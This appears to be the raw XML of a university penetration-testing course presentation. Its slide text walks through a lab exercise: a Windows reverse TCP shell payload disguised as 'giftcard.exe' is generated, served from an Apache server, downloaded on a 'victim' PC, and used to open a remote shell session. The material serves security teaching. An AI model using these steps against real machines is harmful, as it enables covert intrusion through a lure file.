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7" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="274" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="287" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="292" r:id="rId19"/>
    <p:sldId id="293" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="256" r:id="rId22"/>
    <p:sldId id="259" r:id="rId23"/>
    <p:sldId id="264" r:id="rId24"/>
    <p:sldId id="261" r:id="rId25"/>
    <p:sldId id="262" r:id="rId26"/>
    <p:sldId id="263" r:id="rId27"/>
    <p:sldId id="260" r:id="rId28"/>
    <p:sldId id="265" r:id="rId29"/>
    <p:sldId id="266" r:id="rId30"/>
    <p:sldId id="267" r:id="rId31"/>
    <p:sldId id="268" r:id="rId32"/>
    <p:sldId id="269" r:id="rId33"/>
    <p:sldId id="270" r:id="rId34"/>
    <p:sldId id="271" r:id="rId35"/>
    <p:sldId id="272" r:id="rId36"/>
    <p:sldId id="29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042304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7B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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913565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10790313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31307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73205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401989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146180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4548793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451746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89872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77438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7B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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19215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7B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/29/2024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346961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98149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240733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C17B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/29/2024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1468821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17B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/29/2024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B4B2CC-1DF6-44C3-834A-2B109F3E73CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371635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17B732C-875A-48F2-BE56-5F30C8212DAE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/29/2024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0B4B2CC-1DF6-44C3-834A-2B109F3E73CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249358780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hyperlink" Target="http://192.168.152.138/giftcard.exe"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50.jpg"/></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3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35.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EB337A-8D3A-4D66-805D-0EEFB00C1D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1590517" y="940785"/>
            <a:ext cx="8560905" cy="1463606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">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AMERICAN UNIVERSITY OF SCIENCE &amp; TECHNOLOGY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Faculty of Arts and Sciences</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Department of ICT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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UST | AMERICAN UNIVERSITY OF SCIENCE &amp; TECHNOLOGY">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9F0B6A-26EA-4A39-BE11-2C84F3030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0173"/>
            <a:ext cx="1727959" cy="1661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10F615A-AB88-4A8F-9050-A49E3FD31DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561155" y="3429000"/>
            <a:ext cx="2619628" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructor: Dr. Elie Nasr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7DFE21-BDA3-4D18-9471-EFF3C812E83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="4650663"/>
            <a:ext cx="2133600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>By:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ralph Achkar </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A9FCD9-8DB6-4F1B-AAF1-9F557D9DFDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3217648" y="2818169"/>
            <a:ext cx="5756704" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website Security and Penetration Testing – ICT 430</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1410575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1AA8C-0C14-4395-9670-C85C6B790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23" y="2466975"/>
            <a:ext cx="10048875" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9192DCA2-FB7C-427C-B561-D36EE3BDED0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503583" y="1630017"/>
            <a:ext cx="6476453" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We enter 1 in order to start the windows shell reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493621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21603F-F782-43B7-BFC0-8221DA48F7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55" y="2849838"/>
            <a:ext cx="6886575" cy="2085975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE8D90E-A813-46D2-ABE8-E39D866323C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174555" y="1470993"/>
            <a:ext cx="11460853" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, we enter the attacker IP address for the payload listener (192.168.111.128)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And a chosen port (8080)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can see that the payload was exported to the default set directory located under: /home/slingshot/.set/payload.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277716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251836-70C3-460A-95AE-47F292CA3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555" y="5147434"/>
            <a:ext cx="6886575" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A18984-01AD-49AD-A69A-525486287905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174555" y="4293704"/>
            <a:ext cx="6231193" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then we put our file on the apache2 server and start it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using command service apache2 start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4984099-A8FB-495F-A9B3-975A7619F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55" y="1751231"/>
            <a:ext cx="6915150" cy="2190750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CA6BC3-5B6F-48A6-ACD0-47F238CD0111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357809" y="848139"/>
            <a:ext cx="10058400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can see that after few seconds that it started a reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> handler on the attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and port. However no sessions were created yet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191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EE7BAD-F742-47FF-82DE-FFF7F7BD0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57" y="937798"/>
            <a:ext cx="8248650" cy="5724525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29230E33-1C1F-4C54-B78E-DEE43A63A213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344557" y="424070"/>
            <a:ext cx="4652236" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We download the file on the victim’s pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228635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2E080B-1000-4C40-8763-766AED4D6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80" y="1535374"/>
            <a:ext cx="7067550" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FD9D4F-707C-4295-AF9B-7DC7E59E549C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244380" y="509319"/>
            <a:ext cx="9113539" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After downloading the file, we can see that the connection was successful between 192.168.111.128 on port 8080 and 192.168.111.1 on port 55303</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F34F1263-F788-44CE-8E5C-E00A145D2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80" y="4405727"/>
            <a:ext cx="6762750" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01D6F7A-0528-45EF-A01C-14B9EFBD2078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244380" y="3889612"/>
            <a:ext cx="7415813" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We enter sessions –l and we see that we have ID 1 with type shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176407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6E32C-0A3F-400F-B400-B74FD4784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 y="1341673"/>
            <a:ext cx="7115175" cy="4638675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30B27A3-3304-49E3-B5D7-812B3093B5DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286603" y="723331"/>
            <a:ext cx="10046340" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then finally we enter the command: sessions –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1 and we see that we got into the pc shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3549273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668" y="90152"/>
            <a:ext cx="1470531" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Windows 11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8" y="459484"/>
            <a:ext cx="6162675" cy="3629025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141668" y="4208406"/>
            <a:ext cx="11931062" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the current directory, the above shown command will create a file with the name “giftcard.exe”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We enter the command: ls –l giftcard.exe to check its existence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501392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95" y="458927"/>
            <a:ext cx="5667375" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414F7744-89F8-4A03-AEE9-EC24B5A28A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132522" y="2245740"/>
            <a:ext cx="11555896" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we can notice, this executable doesn’t have executable permissions. Therefore, we can give executable permissions using the following command: chmod +x giftcard.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25A644F-6A5F-4020-8843-7D31FBB33D6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132522" y="4408841"/>
            <a:ext cx="2924175" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99104A15-3D50-4E8A-ABBB-12842D62EA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132522" y="3429000"/>
            <a:ext cx="4819650" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF425B61-1941-4B2B-87CE-C722407B652A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132522" y="5188657"/>
            <a:ext cx="8640418" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, our file is ready and we should send it to the victim. Let’s copy this file onto the preinstalled apache server’s root directory in Kali Linux: cp danger.exe /var/www/html.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328063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8F71D1-4D4C-4CDC-9E0F-A569438FD0F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="622852" y="1497495"/>
            <a:ext cx="6917635" cy="3319670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
